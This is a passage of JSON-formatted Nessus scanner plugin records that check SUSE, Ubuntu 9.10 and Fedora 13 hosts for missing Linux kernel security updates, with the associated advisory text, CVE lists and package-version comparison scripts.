rpm_check(release:\"SUSE11.3\", reference:\"kernel-desktop-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-desktop-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-desktop-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-ec2-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-ec2-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-ec2-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-ec2-extra-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-pae-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-pae-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-pae-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-source-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-source-vanilla-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-syms-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-trace-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-trace-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-trace-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vanilla-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vanilla-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vanilla-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vmi-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vmi-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vmi-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-xen-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-xen-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-xen-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"preload-kmp-default-1.1_k2.6.34.7_0.7-19.1.11\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"preload-kmp-desktop-1.1_k2.6.34.7_0.7-19.1.11\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-04-01T07:16:24", "description": "Gleb Napatov discovered that KVM did not correctly check certain\nprivileged operations. A local attacker with access to a guest kernel\ncould exploit this to crash the host system, leading to a denial of\nservice. (CVE-2010-0435)\n\nDan Jacobson discovered that ThinkPad video output was not correctly\naccess controlled. A local attacker could exploit this to hang the\nsystem, leading to a denial of service. (CVE-2010-3448)\n\nIt was discovered that KVM did not correctly initialize certain CPU\nregisters. A local attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2010-3698)\n\nDan Rosenberg discovered that the Linux kernel TIPC implementation\ncontained multiple integer signedness errors. A local attacker could\nexploit this to gain root privileges. (CVE-2010-3859)\n\nThomas Pollet discovered that the RDS network protocol did not check\ncertain iovec buffers. A local attacker could exploit this to crash\nthe system or possibly execute arbitrary code as the root user.\n(CVE-2010-3865)\n\nDan Rosenberg discovered that the Linux kernel X.25 implementation\nincorrectly parsed facilities. A remote attacker could exploit this to\ncrash the kernel, leading to a denial of service. (CVE-2010-3873)\n\nDan Rosenberg discovered that the CAN protocol on 64bit systems did\nnot correctly calculate the size of certain buffers. A local attacker\ncould exploit this to crash the system or possibly execute arbitrary\ncode as the root user. (CVE-2010-3874)\n\nVasiliy Kulikov discovered that the Linux kernel X.25 implementation\ndid not correctly clear kernel memory. A local attacker could exploit\nthis to read kernel stack memory, leading to a loss of privacy.\n(CVE-2010-3875)\n\nVasiliy Kulikov discovered that the Linux kernel sockets\nimplementation did not properly initialize certain structures. A local\nattacker could exploit this to read kernel stack memory, leading to a\nloss of privacy. (CVE-2010-3876)\n\nVasiliy Kulikov discovered that the TIPC interface did not correctly\ninitialize certain structures. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-3877)\n\nNelson Elhage discovered that the Linux kernel IPv4 implementation did\nnot properly audit certain bytecodes in netlink messages. A local\nattacker could exploit this to cause the kernel to hang, leading to a\ndenial of service. (CVE-2010-3880)\n\nDan Rosenberg discovered that IPC structures were not correctly\ninitialized on 64bit systems. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4073)\n\nDan Rosenberg discovered that the USB subsystem did not correctly\ninitialize certian structures. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4074)\n\nDan Rosenberg discovered that the SiS video driver did not correctly\nclear kernel memory. A local attacker could exploit this to read\nkernel stack memory, leading to a loss of privacy. (CVE-2010-4078)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly\ninitialize certian structures. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4079)\n\nDan Rosenberg discovered that the RME Hammerfall DSP audio interface\ndriver did not correctly clear kernel memory. A local attacker could\nexploit this to read kernel stack memory, leading to a loss of\nprivacy. (CVE-2010-4080, CVE-2010-4081)\n\nDan Rosenberg discovered that the VIA video driver did not correctly\nclear kernel memory. A local attacker could exploit this to read\nkernel stack memory, leading to a loss of privacy. (CVE-2010-4082)\n\nDan Rosenberg discovered that the semctl syscall did not correctly\nclear kernel memory. A local attacker could exploit this to read\nkernel stack memory, leading to a loss of privacy. (CVE-2010-4083)\n\nJames Bottomley discovered that the ICP vortex storage array\ncontroller driver did not validate certain sizes. A local attacker on\na 64bit system could exploit this to crash the kernel, leading to a\ndenial of service. (CVE-2010-4157)\n\nDan Rosenberg discovered that the Linux kernel L2TP implementation\ncontained multiple integer signedness errors. A local attacker could\nexploit this to to crash the kernel, or possibly gain root privileges.\n(CVE-2010-4160)\n\nSteve Chen discovered that setsockopt did not correctly check MSS\nvalues. A local attacker could make a specially crafted socket call to\ncrash the system, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly\nhandle merged VMAs. A local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2010-4169)\n\nIt was discovered that multithreaded exec did not handle CPU timers\ncorrectly. A local attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2010-4248)\n\nVegard Nossum discovered that memory garbage collection was not\nhandled correctly for active sockets. A local attacker could exploit\nthis to allocate all available kernel memory, leading to a denial of\nservice. (CVE-2010-4249).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "published": "2011-03-01T00:00:00", "title": "Ubuntu 9.10 : linux, linux-ec2 vulnerabilities (USN-1073-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4074", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-3859", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-3877", "CVE-2010-3875", "CVE-2010-3876", "CVE-2010-3698", "CVE-2010-4248", "CVE-2010-4079", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-4160", "CVE-2010-3873", "CVE-2010-3448", "CVE-2010-4078"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev", "p-cpe:/a:canonical:ubuntu_linux:linux-doc", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ec2", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-ec2-doc", "p-cpe:/a:canonical:ubuntu_linux:linux-ec2-source-2.6.31", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.31", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386"], "id": "UBUNTU_USN-1073-1.NASL", "href": "https://www.tenable.com/plugins/nessus/52476", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1073-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(52476);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/16 10:34:22\");\n\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-3448\", \"CVE-2010-3698\", \"CVE-2010-3859\", \"CVE-2010-3865\", \"CVE-2010-3873\", \"CVE-2010-3874\", \"CVE-2010-3875\", \"CVE-2010-3876\", \"CVE-2010-3877\", \"CVE-2010-3880\", \"CVE-2010-4073\", \"CVE-2010-4074\", \"CVE-2010-4078\", \"CVE-2010-4079\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4082\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4160\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4248\", \"CVE-2010-4249\");\n script_bugtraq_id(38607, 42582, 43809, 43810, 43817, 44354, 44500, 44549, 44630, 44642, 44648, 44661, 44665, 44762, 44830, 44861, 45028, 45037, 45058, 45062, 45063, 45074);\n script_xref(name:\"USN\", value:\"1073-1\");\n\n script_name(english:\"Ubuntu 9.10 : linux, linux-ec2 vulnerabilities (USN-1073-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Gleb Napatov discovered that KVM did not correctly check certain\nprivileged operations. A local attacker with access to a guest kernel\ncould exploit this to crash the host system, leading to a denial of\nservice. (CVE-2010-0435)\n\nDan Jacobson discovered that ThinkPad video output was not correctly\naccess controlled. A local attacker could exploit this to hang the\nsystem, leading to a denial of service. (CVE-2010-3448)\n\nIt was discovered that KVM did not correctly initialize certain CPU\nregisters. A local attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2010-3698)\n\nDan Rosenberg discovered that the Linux kernel TIPC implementation\ncontained multiple integer signedness errors. A local attacker could\nexploit this to gain root privileges. (CVE-2010-3859)\n\nThomas Pollet discovered that the RDS network protocol did not check\ncertain iovec buffers. A local attacker could exploit this to crash\nthe system or possibly execute arbitrary code as the root user.\n(CVE-2010-3865)\n\nDan Rosenberg discovered that the Linux kernel X.25 implementation\nincorrectly parsed facilities. A remote attacker could exploit this to\ncrash the kernel, leading to a denial of service. (CVE-2010-3873)\n\nDan Rosenberg discovered that the CAN protocol on 64bit systems did\nnot correctly calculate the size of certain buffers. A local attacker\ncould exploit this to crash the system or possibly execute arbitrary\ncode as the root user. (CVE-2010-3874)\n\nVasiliy Kulikov discovered that the Linux kernel X.25 implementation\ndid not correctly clear kernel memory. A local attacker could exploit\nthis to read kernel stack memory, leading to a loss of privacy.\n(CVE-2010-3875)\n\nVasiliy Kulikov discovered that the Linux kernel sockets\nimplementation did not properly initialize certain structures. A local\nattacker could exploit this to read kernel stack memory, leading to a\nloss of privacy. (CVE-2010-3876)\n\nVasiliy Kulikov discovered that the TIPC interface did not correctly\ninitialize certain structures. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-3877)\n\nNelson Elhage discovered that the Linux kernel IPv4 implementation did\nnot properly audit certain bytecodes in netlink messages. A local\nattacker could exploit this to cause the kernel to hang, leading to a\ndenial of service. (CVE-2010-3880)\n\nDan Rosenberg discovered that IPC structures were not correctly\ninitialized on 64bit systems. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4073)\n\nDan Rosenberg discovered that the USB subsystem did not correctly\ninitialize certian structures. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4074)\n\nDan Rosenberg discovered that the SiS video driver did not correctly\nclear kernel memory. A local attacker could exploit this to read\nkernel stack memory, leading to a loss of privacy. (CVE-2010-4078)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly\ninitialize certian structures. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4079)\n\nDan Rosenberg discovered that the RME Hammerfall DSP audio interface\ndriver did not correctly clear kernel memory. A local attacker could\nexploit this to read kernel stack memory, leading to a loss of\nprivacy. (CVE-2010-4080, CVE-2010-4081)\n\nDan Rosenberg discovered that the VIA video driver did not correctly\nclear kernel memory. A local attacker could exploit this to read\nkernel stack memory, leading to a loss of privacy. (CVE-2010-4082)\n\nDan Rosenberg discovered that the semctl syscall did not correctly\nclear kernel memory. A local attacker could exploit this to read\nkernel stack memory, leading to a loss of privacy. (CVE-2010-4083)\n\nJames Bottomley discovered that the ICP vortex storage array\ncontroller driver did not validate certain sizes. A local attacker on\na 64bit system could exploit this to crash the kernel, leading to a\ndenial of service. (CVE-2010-4157)\n\nDan Rosenberg discovered that the Linux kernel L2TP implementation\ncontained multiple integer signedness errors. A local attacker could\nexploit this to to crash the kernel, or possibly gain root privileges.\n(CVE-2010-4160)\n\nSteve Chen discovered that setsockopt did not correctly check MSS\nvalues. A local attacker could make a specially crafted socket call to\ncrash the system, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly\nhandle merged VMAs. A local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2010-4169)\n\nIt was discovered that multithreaded exec did not handle CPU timers\ncorrectly. A local attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2010-4248)\n\nVegard Nossum discovered that memory garbage collection was not\nhandled correctly for active sockets. A local attacker could exploit\nthis to allocate all available kernel memory, leading to a denial of\nservice. (CVE-2010-4249).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1073-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-ec2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-ec2-source-2.6.31\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.31\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/08/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2010-0435\", \"CVE-2010-3448\", \"CVE-2010-3698\", \"CVE-2010-3859\", \"CVE-2010-3865\", \"CVE-2010-3873\", \"CVE-2010-3874\", \"CVE-2010-3875\", \"CVE-2010-3876\", \"CVE-2010-3877\", \"CVE-2010-3880\", \"CVE-2010-4073\", \"CVE-2010-4074\", \"CVE-2010-4078\", \"CVE-2010-4079\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4082\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4160\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4248\", \"CVE-2010-4249\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1073-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-doc\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-ec2-doc\", pkgver:\"2.6.31-307.27\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-ec2-source-2.6.31\", pkgver:\"2.6.31-307.27\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-22\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-22-386\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-22-generic\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-22-generic-pae\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-22-server\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-307\", pkgver:\"2.6.31-307.27\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-headers-2.6.31-307-ec2\", pkgver:\"2.6.31-307.27\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-22-386\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-22-generic\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-22-generic-pae\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-22-lpia\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-22-server\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-22-virtual\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-image-2.6.31-307-ec2\", pkgver:\"2.6.31-307.27\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.31-22.73\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"linux-source-2.6.31\", pkgver:\"2.6.31-22.73\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-doc / linux-ec2-doc / linux-ec2-source-2.6.31 / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:09:25", "description": "Stable update 2.6.34.8, extra bug fixes, some basic hardware backports\nfor Intel Sandy Bridge upon request. Update to kernel 2.6.34.8:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.34/ChangeLog\n-2.6.34.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2011-03-08T00:00:00", "title": "Fedora 13 : kernel-2.6.34.8-68.fc13 (2011-2134)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-4346", "CVE-2010-4649", "CVE-2011-0006", "CVE-2010-4650", "CVE-2011-1044", "CVE-2010-4648"], "modified": "2011-03-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2011-2134.NASL", "href": "https://www.tenable.com/plugins/nessus/52571", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-2134.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52571);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-4163\", \"CVE-2010-4165\", \"CVE-2010-4346\", \"CVE-2010-4648\", \"CVE-2010-4649\", \"CVE-2010-4650\", \"CVE-2010-4668\", \"CVE-2011-0006\", \"CVE-2011-0521\", \"CVE-2011-1044\");\n script_bugtraq_id(44793, 44830, 45323, 45660, 45986, 46073, 46322, 46323, 46488);\n script_xref(name:\"FEDORA\", value:\"2011-2134\");\n\n script_name(english:\"Fedora 13 : kernel-2.6.34.8-68.fc13 (2011-2134)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stable update 2.6.34.8, extra bug fixes, some basic hardware backports\nfor Intel Sandy Bridge upon request. Update to kernel 2.6.34.8:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.34/ChangeLog\n-2.6.34.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.34/ChangeLog-2.6.34.8\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f290312c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=652508\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=652957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=662189\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=667892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=667907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=667912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=667916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=672398\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-March/055238.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bda7c3b9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/03/08\");\n 